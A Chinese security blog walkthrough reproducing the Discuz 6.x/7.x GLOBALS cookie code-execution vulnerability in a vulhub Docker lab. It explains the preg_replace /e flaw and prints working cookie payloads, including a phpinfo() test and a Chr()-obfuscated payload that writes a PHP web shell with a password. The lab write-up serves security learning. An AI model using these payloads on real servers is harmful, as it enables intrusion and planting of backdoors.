<!doctype html>
<html lang="zh"><head>
<title>discuz全局变量防御绕过导致代码执行(wooyun-2010-080723) - X8@0E的博客</title>
<meta charset="UTF-8">
<meta name="keywords" content="">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<meta name="description" content="discuz全局变量防御绕过导致代码执行(wooyun-2010-080723)位置discuz&#x2F;wooyun-2010-080723 参考：https:&#x2F;&#x2F;blog.csdn.net&#x2F;qq_34851291&#x2F;article&#x2F;details&#x2F;144055569 漏洞原理该漏洞的产生与 PHP 的配置参数register_globals和request_order有关。当register_">
<meta property="og:type" content="article">
<meta property="og:title" content="discuz全局变量防御绕过导致代码执行(wooyun-2010-080723)">
<meta property="og:url" content="http://example.com/2025/09/15/discuz%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E9%98%B2%E5%BE%A1%E7%BB%95%E8%BF%87%E5%AF%BC%E8%87%B4%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/index.html">
<meta property="og:site_name" content="X8@0E的博客">
<meta property="og:description" content="discuz全局变量防御绕过导致代码执行(wooyun-2010-080723)位置discuz&#x2F;wooyun-2010-080723 参考：https:&#x2F;&#x2F;blog.csdn.net&#x2F;qq_34851291&#x2F;article&#x2F;details&#x2F;144055569 漏洞原理该漏洞的产生与 PHP 的配置参数register_globals和request_order有关。当register_">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/imgs/$%7Bfiilename%7D/image-20250915165738487.png">
<meta property="og:image" content="http://example.com/imgs/$%7Bfiilename%7D/image-20250915184925142.png">
<meta property="og:image" content="http://example.com/imgs/$%7Bfiilename%7D/image-20250915185642672.png">
<meta property="og:image" content="http://example.com/imgs/$%7Bfiilename%7D/image-20250915190019853.png">
<meta property="og:image" content="http://example.com/imgs/$%7Bfiilename%7D/image-20250915190134213.png">
<meta property="og:image" content="http://example.com/imgs/$%7Bfiilename%7D/image-20250915190306244.png">
<meta property="og:image" content="http://example.com/imgs/$%7Bfiilename%7D/image-20250915191710237.png">
<meta property="og:image" content="http://example.com/imgs/$%7Bfiilename%7D/image-20250915192037055.png">
<meta property="og:image" content="http://example.com/imgs/$%7Bfiilename%7D/image-20250915192050570.png">
<meta property="og:image" content="http://example.com/imgs/$%7Bfiilename%7D/image-20250915200332810.png">
<meta property="og:image" content="http://example.com/imgs/$%7Bfiilename%7D/image-20250915195514881.png">
<meta property="article:published_time" content="2025-09-15T08:47:22.003Z">
<meta property="article:modified_time" content="2025-09-17T02:26:44.342Z">
<meta property="article:author" content="X8@0E">
<meta property="article:tag" content="Cookie--GLOBALS">
<meta property="article:tag" content="docker交互式shell">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/imgs/$%7Bfiilename%7D/image-20250915165738487.png">

<link rel="stylesheet" href="/lib/fancybox/fancybox.css">
<link rel="stylesheet" href="/lib/mdui_043tiny/mdui.css">


<link rel="stylesheet" href="/lib/iconfont/iconfont.css?v=1765792268254">

<link rel="stylesheet" href="/css/style.css?v=1765792268254">




    
        <link rel="stylesheet" href="/custom.css?v=1765792268254">
    



<script src="/lib/mdui_043tiny/mdui.js" async></script>
<script src="/lib/fancybox/fancybox.umd.js" async></script>
<script src="/lib/lax.min.js" async></script>


<script async src="/js/app.js?v=1765792268254"></script>

 

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-4D4ZJ9G024"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag("js", new Date());

  gtag("config", "G-4D4ZJ9G024");
</script>


<link rel="stylesheet"  href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/atom-one-dark.min.css">
<meta name="generator" content="Hexo 7.3.0"></head><body class="nexmoe mdui-drawer-body-left"><div id="nexmoe-background"><div class="nexmoe-bg" style="background-image: url(https://img-baofun.zhhainiao.com/pcwallpaper_ugc/static/55f0c32a6a773efe8c6a6a8158a06f18.jpg?x-oss-process=image%2fresize%2cm_lfit%2cw_1920%2ch_1080)"></div><div class="mdui-appbar mdui-shadow-0"><div class="mdui-toolbar"><a class="mdui-btn mdui-btn-icon mdui-ripple" mdui-drawer="{target: &#039;#drawer&#039;, swipe: true}" title="menu"><i class="mdui-icon nexmoefont icon-menu"></i></a><div class="mdui-toolbar-spacer"></div><a class="mdui-btn mdui-btn-icon" href="/" title="X8@0E"><img src="https://n.sinaimg.cn/sinakd20119/560/w1080h1080/20220924/802a-0c9750f1fa5aa25624c0847a082aaba1.jpg" alt="X8@0E"></a></div></div></div><div id="nexmoe-header"><div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="X8@0E">
            <img src="https://n.sinaimg.cn/sinakd20119/560/w1080h1080/20220924/802a-0c9750f1fa5aa25624c0847a082aaba1.jpg" alt="X8@0E" alt="X8@0E">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>文章</span>43</div>
        <div><span>标签</span>69</div>
        <div><span>分类</span>15</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple false" href="/archives.html" title="文章归档">
            <i class="mdui-list-item-icon nexmoefont icon-douban-fill"></i>
            <div class="mdui-list-item-content">
                文章归档
            </div>
        </a>
        
    </div>
    
    
        
        <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
        
            <form id="search_form">
                <label><input class="st-default-search-input" id="search_value" name="q" type="search" placeholder="搜索" style="
                    font-size: 15px !important;
                    height: 56px !important;
                    background-image: none;
                "></label>
            </form>
         
    </div>
</div>


	<script async src="/js/search.js?v=1765792268255"></script>



    
        
        <div class="nexmoe-widget-wrap">
	<div class="nexmoe-widget nexmoe-social">
		<a
			class="mdui-ripple"
			href="https://blog.csdn.net/2301_81325456/article/details/147025965"
			target="_blank"
			mdui-tooltip="{content: 'CSDN'}"
			style="
				color: rgb(247, 132, 34);
				background-color: rgba(247, 132, 34, .1);
			"
		>
			<i
				class="nexmoefont icon-github"
			></i> </a
		>
	</div>
</div>

    
        
        
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章分类</h3>
    <div class="nexmoe-widget">

      <ul class="category-list">

        


        

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Crypto/">Crypto</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/NSSCTF/">NSSCTF</a>
          <span class="category-list-count">2</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/SQL注入/">SQL注入</a>
          <span class="category-list-count">7</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Vulnhub/">Vulnhub</a>
          <span class="category-list-count">2</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Vulnvm靶机复现/">Vulnvm靶机复现</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/ctfshow-web-信息收集/">ctfshow-web-信息收集</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/ctfshow-web-命令执行/">ctfshow-web-命令执行</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/ctfshow-web-文件上传/">ctfshow-web-文件上传</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/ctfshow-web-文件包含/">ctfshow-web-文件包含</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/ctfshow-web-爆破/">ctfshow-web-爆破</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/sql注入/">sql注入</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/vulhub/">vulhub</a>
          <span class="category-list-count">7</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/春秋云镜-com/">春秋云镜.com</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/群友靶机/">群友靶机</a>
          <span class="category-list-count">15</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/自制靶机/">自制靶机</a>
          <span class="category-list-count">1</span>
        </li>

        
      </ul>

    </div>
  </div>


    
        
        
  <div class="nexmoe-widget-wrap">
    <div id="randomtagcloud" class="nexmoe-widget tagcloud nexmoe-rainbow">
      <a href="/tags/1Panel/" style="font-size: 10px;">1Panel</a> <a href="/tags/3%E4%B8%AA%E7%82%B9/" style="font-size: 10px;">3个点</a> <a href="/tags/Argon2Cracker/" style="font-size: 10px;">Argon2Cracker</a> <a href="/tags/Cookie-GLOBALS/" style="font-size: 10px;">Cookie--GLOBALS</a> <a href="/tags/Cypher%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">Cypher注入</a> <a href="/tags/DC/" style="font-size: 10px;">DC</a> <a href="/tags/GIF%E7%BB%95%E8%BF%87/" style="font-size: 10px;">GIF绕过</a> <a href="/tags/Jinja2/" style="font-size: 10px;">Jinja2</a> <a href="/tags/JoomScan/" style="font-size: 10px;">JoomScan</a> <a href="/tags/LFI%E5%88%B0RCE-open%E5%87%BD%E6%95%B0/" style="font-size: 10px;">LFI到RCE(open函数)</a> <a href="/tags/NSSCTF/" style="font-size: 13.33px;">NSSCTF</a> <a href="/tags/Nginx%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E/" style="font-size: 10px;">Nginx解析漏洞</a> <a href="/tags/RSA/" style="font-size: 10px;">RSA</a> <a href="/tags/RUNPATH/" style="font-size: 10px;">RUNPATH</a> <a href="/tags/Rabbit/" style="font-size: 10px;">Rabbit</a> <a href="/tags/SQL/" style="font-size: 20px;">SQL</a> <a href="/tags/SQLMAP/" style="font-size: 10px;">SQLMAP</a> <a href="/tags/SSRF/" style="font-size: 10px;">SSRF</a> <a href="/tags/Vulnhub/" style="font-size: 10px;">Vulnhub</a> <a href="/tags/Vulnvm/" style="font-size: 10px;">Vulnvm</a> <a href="/tags/WAF/" style="font-size: 10px;">WAF</a> <a href="/tags/basic%E8%AE%A4%E8%AF%81%E7%88%86%E7%A0%B4/" style="font-size: 10px;">basic认证爆破</a> <a href="/tags/cgi%E6%96%87%E4%BB%B6/" style="font-size: 10px;">cgi文件</a> <a href="/tags/ctfshow/" style="font-size: 16.67px;">ctfshow</a> <a href="/tags/docker%E4%BA%A4%E4%BA%92%E5%BC%8Fshell/" style="font-size: 10px;">docker交互式shell</a> <a href="/tags/ffuf/" style="font-size: 10px;">ffuf</a> <a href="/tags/flask/" style="font-size: 10px;">flask</a> <a href="/tags/fork%E8%A7%A3%E5%86%B3%E6%96%AD%E8%BF%9E/" style="font-size: 10px;">fork解决断连</a> <a href="/tags/ghfs/" style="font-size: 10px;">ghfs</a> <a href="/tags/ldd/" style="font-size: 10px;">ldd</a> <a href="/tags/lsattr-%E6%9F%A5%E7%9C%8B%E6%96%87%E4%BB%B6%E6%89%A9%E5%B1%95%E5%B1%9E%E6%80%A7/" style="font-size: 10px;">lsattr--查看文件扩展属性</a> <a href="/tags/motto/" style="font-size: 10px;">motto</a> <a href="/tags/msfvenom/" style="font-size: 13.33px;">msfvenom</a> <a href="/tags/mysql-old-password/" style="font-size: 10px;">mysql_old_password</a> <a href="/tags/nikto/" style="font-size: 10px;">nikto</a> <a href="/tags/openfire/" style="font-size: 10px;">openfire</a> <a href="/tags/poc/" style="font-size: 10px;">poc</a> <a href="/tags/put%E6%96%B9%E6%B3%95/" style="font-size: 10px;">put方法</a> <a href="/tags/rce/" style="font-size: 10px;">rce</a> <a href="/tags/readelf/" style="font-size: 10px;">readelf</a> <a href="/tags/scp/" style="font-size: 10px;">scp</a> <a href="/tags/sqlmap/" style="font-size: 10px;">sqlmap</a> <a href="/tags/sql%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">sql二次注入</a> <a href="/tags/ssh%E5%BC%B1%E5%8F%A3%E4%BB%A4%E7%88%86%E7%A0%B4/" style="font-size: 10px;">ssh弱口令爆破</a> <a href="/tags/ssh%E7%A7%98%E9%92%A5%E7%94%9F%E6%88%90%E8%BF%9E%E6%8E%A5/" style="font-size: 10px;">ssh秘钥生成连接</a> <a href="/tags/stegseek/" style="font-size: 10px;">stegseek</a> <a href="/tags/suForce/" style="font-size: 10px;">suForce</a> <a href="/tags/url%E6%88%AA%E6%96%AD/" style="font-size: 10px;">url截断</a> <a href="/tags/vite/" style="font-size: 10px;">vite</a> <a href="/tags/web%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" style="font-size: 10px;">web命令执行</a> <a href="/tags/web%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" style="font-size: 10px;">web文件上传</a> <a href="/tags/web%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" style="font-size: 10px;">web文件包含</a> <a href="/tags/web%E6%BA%90%E7%A0%81%E6%B3%84%E9%9C%B2/" style="font-size: 10px;">web源码泄露</a> <a href="/tags/web%E7%88%86%E7%A0%B4/" style="font-size: 10px;">web爆破</a> <a href="/tags/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E-CVE-2025-30208/" style="font-size: 10px;">任意文件读取漏洞(CVE-2025-30208)</a> <a href="/tags/%E5%87%AF%E6%92%92%E5%AF%86%E7%A0%81/" style="font-size: 10px;">凯撒密码</a> <a href="/tags/%E5%90%8E%E9%9D%A2%E5%8A%A0-jpg%E5%90%8E%E7%BC%80/" style="font-size: 10px;">后面加.jpg后缀</a> <a href="/tags/%E5%9F%9F%E6%8E%A7/" style="font-size: 10px;">域控</a> <a href="/tags/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4/" style="font-size: 10px;">密码爆破</a> <a href="/tags/%E6%8F%90%E6%9D%83-env-reset/" style="font-size: 10px;">提权!env_reset</a> <a href="/tags/%E6%8F%92%E4%BB%B6%E6%BC%8F%E6%B4%9E/" style="font-size: 10px;">插件漏洞</a> <a href="/tags/%E6%97%A5%E5%BF%97%E6%B3%A8%E5%85%A5-ua%E6%B7%BB%E5%8A%A0%E6%9C%A8%E9%A9%AC/" style="font-size: 10px;">日志注入+ua添加木马</a> <a href="/tags/%E6%AD%A3%E5%90%91shell/" style="font-size: 10px;">正向shell</a> <a href="/tags/%E7%8A%B6%E6%80%81%E7%A0%81/" style="font-size: 10px;">状态码</a> <a href="/tags/%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F/" style="font-size: 10px;">环境变量</a> <a href="/tags/%E7%A9%BA%E6%A0%BC/" style="font-size: 10px;">空格</a> <a href="/tags/%E7%BB%B4%E5%90%89%E5%B0%BC%E4%BA%9A%E5%AF%86%E7%A0%81/" style="font-size: 10px;">维吉尼亚密码</a> <a href="/tags/%E8%9A%81%E5%89%91/" style="font-size: 10px;">蚁剑</a> <a href="/tags/%E8%B6%8A%E7%95%8C%E8%AF%BB%E5%8F%96/" style="font-size: 10px;">越界读取</a>
    </div>
    
      <script>
        var maxTagcloud = parseInt(17);
        var tags_length = parseInt(69);
        var tags_arr = [];
        for(var i = 0; i < tags_length; i++){
          tags_arr.push(i);
        }
        tags_arr.sort(function (l, r) {
          return Math.random() > 0.5 ? -1 : 1;
        });
        tags_arr = tags_arr.slice(0, maxTagcloud < tags_length ? tags_length - maxTagcloud : 0);
        for(var tag_i = 0; tag_i < tags_arr.length; tag_i++){
          document.getElementById("randomtagcloud").children[tags_arr[tag_i]].style.display = 'none';
        }
      </script>
    
  </div>

    
        
        
        
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章归档</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/">2025</a><span class="archive-list-count">43</span></li></ul>
    </div>
  </div>



    
        
        
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">最新文章</h3>
    <div class="nexmoe-widget">
      <ul>
        
          <li>
            <a href="/2025/11/19/openfire/">CVE-2023-323115</a>
          </li>
        
          <li>
            <a href="/2025/11/13/SQL%E6%B3%A8%E5%85%A5-SQLMAP%E5%9F%BA%E7%A1%80%E4%BD%BF%E7%94%A8/">SQL注入-SQLMAP基础使用</a>
          </li>
        
          <li>
            <a href="/2025/11/13/SQL%E6%B3%A8%E5%85%A5-HTTP%E5%A4%B4%E9%83%A8%E6%B3%A8%E5%85%A5/">SQL注入-HTTP头部注入</a>
          </li>
        
          <li>
            <a href="/2025/11/13/SQL%E6%B3%A8%E5%85%A5-%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84%E7%9B%B2%E6%B3%A8/">SQL注入-基于时间的盲注</a>
          </li>
        
          <li>
            <a href="/2025/11/12/SQL%E6%B3%A8%E5%85%A5-%E5%9F%BA%E4%BA%8E%E5%B8%83%E5%B0%94%E7%9A%84%E7%9B%B2%E6%B3%A8/">SQL注入-基于布尔的盲注</a>
          </li>
        
      </ul>
    </div>
  </div>

    
        
        <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-link">
		<ul>
        
            <li>
                <a href="" target="_blank" >
                    <img src="https://n.sinaimg.cn/sinakd20119/560/w1080h1080/20220924/802a-0c9750f1fa5aa25624c0847a082aaba1.jpg" alt="X8@0E"></img>
                    <p>X8@0E</p>
                </a>
            </li>
        
		</ul>
    </div>
</div>
<style>
.nexmoe-widget-wrap .nexmoe-link ul li a {
    text-align : center;
}
.nexmoe-widget-wrap .nexmoe-link ul li a img {
    max-width : 100%;
}
.nexmoe-widget-wrap .nexmoe-link ul li a p {
    margin: 10px 0;
}
</style>

    
   
    <div class="nexmoe-copyright">
        &copy; 2025 X8@0E
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://github.com/theme-nexmoe/hexo-theme-nexmoe" target="_blank">Nexmoe</a>
        
    </div>
</div><!-- .nexmoe-drawer --></div><div id="nexmoe-content"><div class="nexmoe-primary"><div class="nexmoe-post">
  <article>
    
        <div class="nexmoe-post-cover absolute" style="padding-top: NaN%;"> 
            <img src="https://res.52yyxk.com/pcwallpaper_ugc/static/9f3c7531a75809a381e6a5b9423bf07e.jpg" alt="discuz全局变量防御绕过导致代码执行(wooyun-2010-080723)" loading="lazy">
            <h1>discuz全局变量防御绕过导致代码执行(wooyun-2010-080723)</h1>
        </div>
    
    
    <div class="nexmoe-post-meta">
    <div class="nexmoe-rainbow">
        <a class="nexmoefont icon-calendar-fill">2025年09月15日</a>
        
            <a class="nexmoefont icon-appstore-fill -link" href="/categories/vulhub/">vulhub</a>
        
        
    </div>
    
    
    
    
    
</div>

    <h1 id="discuz全局变量防御绕过导致代码执行-wooyun-2010-080723"><a href="#discuz全局变量防御绕过导致代码执行-wooyun-2010-080723" class="headerlink" title="discuz全局变量防御绕过导致代码执行(wooyun-2010-080723)"></a>discuz全局变量防御绕过导致代码执行(wooyun-2010-080723)</h1><h2 id="位置"><a href="#位置" class="headerlink" title="位置"></a>位置</h2><p>discuz&#x2F;wooyun-2010-080723</p>
<p>参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_34851291/article/details/144055569">https://blog.csdn.net/qq_34851291/article/details/144055569</a></p>
<h2 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h2><p>该漏洞的产生与 PHP 的配置参数register_globals和request_order有关。当register_globals开启时，PHP 会将来自 GET、POST、COOKIE 等外部输入的数据直接注册为全局变量。在 PHP 5.3.x 版本中，request_order配置默认为 GP（即 Get 和 Post），这意味着 Cookie 中的数据并不会被自动注册为全局变量。但在 Discuz 7.x&#x2F;6.x 中，攻击者可以在 Cookie 中设置带有恶意代码的GLOBALS变量，从而绕过全局变量防御，实现代码执行。</p>
<h2 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h2><p>Discuz 6.x、7.x。</p>
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>安装 Discuz 后，找到一个已存在的帖子，截断其数据包，在 Cookie 中添加 Payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies]</span><br></pre></td></tr></table></figure>

<h1 id="开启环境"><a href="#开启环境" class="headerlink" title="开启环境"></a>开启环境</h1><p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/../imgs/$%7Bfiilename%7D/image-20250915165738487.png" alt="image-20250915165738487" data-caption="image-20250915165738487" loading="lazy"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">└─# <span class="built_in">cat</span> docker-compose.yml      </span><br><span class="line">services:</span><br><span class="line">  discuz:</span><br><span class="line">    image: vulhub/discuz:7.2</span><br><span class="line">    depends_on:</span><br><span class="line">      - db</span><br><span class="line">    ports:</span><br><span class="line">      - <span class="string">&quot;8080:80&quot;</span></span><br><span class="line">  db:</span><br><span class="line">    image: mysql:5.5</span><br><span class="line">    environment: </span><br><span class="line">      MYSQL_ROOT_PASSWORD: root</span><br><span class="line">      MYSQL_DATABASE: discuz</span><br></pre></td></tr></table></figure>

<p>直接访问会出错，需要安装</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/../imgs/$%7Bfiilename%7D/image-20250915184925142.png" alt="image-20250915184925142" data-caption="image-20250915184925142" loading="lazy"></p>
<p>浏览器访问<a target="_blank" rel="noopener" href="http://192.168.196.128:8080/install/%EF%BC%8C%E5%AE%89%E8%A3%85%E6%95%B0%E6%8D%AE%E5%BA%93%E3%80%82%E5%85%88%E5%90%8C%E6%84%8F%E6%8E%88%E6%9D%83%E5%8D%8F%E8%AE%AE%EF%BC%8C%E4%B8%8B%E4%B8%80%E6%AD%A5%E5%AE%89%E8%A3%85%EF%BC%8C%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%A1%AB%E5%86%99db%EF%BC%8C%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E4%B8%BAdiscuz%EF%BC%8C%E6%95%B0%E6%8D%AE%E5%BA%93%E7%94%A8%E6%88%B7%E5%90%8D%E5%92%8C%E5%AF%86%E7%A0%81%E5%9D%87%E4%B8%BAroot%EF%BC%8C%E5%85%B6%E4%BB%96%E4%B8%8D%E6%94%B9%E5%8A%A8%E3%80%82%E7%AE%A1%E7%90%86%E5%91%98%E5%AF%86%E7%A0%81%E4%BB%BB%E6%84%8F%EF%BC%8C%E5%8F%AF%E4%BB%A5%E4%B8%BAadmin%E3%80%82%E5%A1%AB%E5%86%99%E8%81%94%E7%B3%BB%E6%96%B9%E5%BC%8F%E9%A1%B5%E9%9D%A2%E7%9B%B4%E6%8E%A5%E7%82%B9%E5%87%BB%E8%B7%B3%E8%BF%87%E6%9C%AC%E6%AD%A5%E5%90%8E%E8%B7%B3%E8%BD%AC%E5%88%B0%E9%A6%96%E9%A1%B5%E3%80%82">http://192.168.196.128:8080/install/，安装数据库。先同意授权协议，下一步安装，数据库服务器填写db，数据库名为discuz，数据库用户名和密码均为root，其他不改动。管理员密码任意，可以为admin。填写联系方式页面直接点击跳过本步后跳转到首页。</a></p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/../imgs/$%7Bfiilename%7D/image-20250915185642672.png" alt="image-20250915185642672" data-caption="image-20250915185642672" loading="lazy"></p>
<p>用户名admin和密码admin登录成功后进入默认板块，用一下这个论坛。</p>
<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/../imgs/$%7Bfiilename%7D/image-20250915190019853.png" alt="image-20250915190019853" data-caption="image-20250915190019853" loading="lazy"></p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>开启BurpSuit抓包，然后随便点击一篇贴子，BurpSuit拦截后将Cookie修改为下面，点击放包。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();   //这是一个非常经典且危险的 PHP代码注入攻击载荷（Payload），通常针对具有特定漏洞的老旧PHP程序（如Discuz!、WordPress或其他使用老旧PHP编码方式的CMS）。攻击者构造一个HTTP请求，在Cookie或POST数据中填入以上内容</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">这个字符串试图通过HTTP请求（通常是Cookie或POST数据）向服务器传递两个变量：</span><br><span class="line">GLOBALS[_DCACHE][smilies][searcharray]： 值为 /.*/eui</span><br><span class="line">GLOBALS[_DCACHE][smilies][replacearray]： 值为 phpinfo();</span><br><span class="line"></span><br><span class="line">攻击载荷解析：如何执行代码？</span><br><span class="line">现在，我们来看攻击者覆盖进去的值如何让这段代码变成致命漏洞：</span><br><span class="line">searcharray = /.*/eui</span><br><span class="line">.*： 正则表达式，匹配任意字符（整个字符串）。</span><br><span class="line">e： 这是整个攻击的核心！ 这是一个已被废弃的PCRE修饰符。它告诉 preg_replace()，在执行替换后，要将替换结果（$replace）作为PHP代码来执行。</span><br><span class="line">u： Unicode模式。</span><br><span class="line">i： 忽略大小写。</span><br><span class="line">replacearray = phpinfo();</span><br><span class="line">这是将要被执行的PHP代码。phpinfo() 是一个函数，它会输出大量关于当前PHP环境的配置信息。</span><br></pre></td></tr></table></figure>

<p>条件<strong>存在危险的字符串替换操作</strong><br>目标程序中某处存在使用 <code>preg_replace()</code> 函数的代码，并且其参数正好使用了被覆盖的这两个变量 <code>$_DCACHE[&#39;smilies&#39;][&#39;searcharray&#39;]</code> 和 <code>$_DCACHE[&#39;smilies&#39;][&#39;replacearray&#39;]</code>。代码可能看起来像这样：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">// 某处存在漏洞的代码</span><br><span class="line">$content = preg_replace(</span><br><span class="line">    $_DCACHE[&#x27;smilies&#x27;][&#x27;searcharray&#x27;],   // 搜索模式</span><br><span class="line">    $_DCACHE[&#x27;smilies&#x27;][&#x27;replacearray&#x27;],  // 替换内容</span><br><span class="line">    $content                              // 要处理的文本</span><br><span class="line">);</span><br></pre></td></tr></table></figure>

<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/../imgs/$%7Bfiilename%7D/image-20250915190134213.png" alt="image-20250915190134213" data-caption="image-20250915190134213" loading="lazy"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();</span><br></pre></td></tr></table></figure>

<p><img onerror="imgOnError(this);" data-fancybox="gallery" src="/../imgs/$%7Bfiilename%7D/image-20250915190306244.png" alt="image-20250915190306244" data-caption="image-20250915190306244" loading="lazy"></p>
<h2 id="木马文件"><a href="#木马文件" class="headerlink" title="木马文件"></a>木马文件</h2><p>同样方法传入以下Cookie写入一句话木马文件，文件为x.php，密码为pwd</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># EXP</span><br><span class="line">Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))</span><br></pre></td></tr></table></figure>

<p>去容器里看看</p>
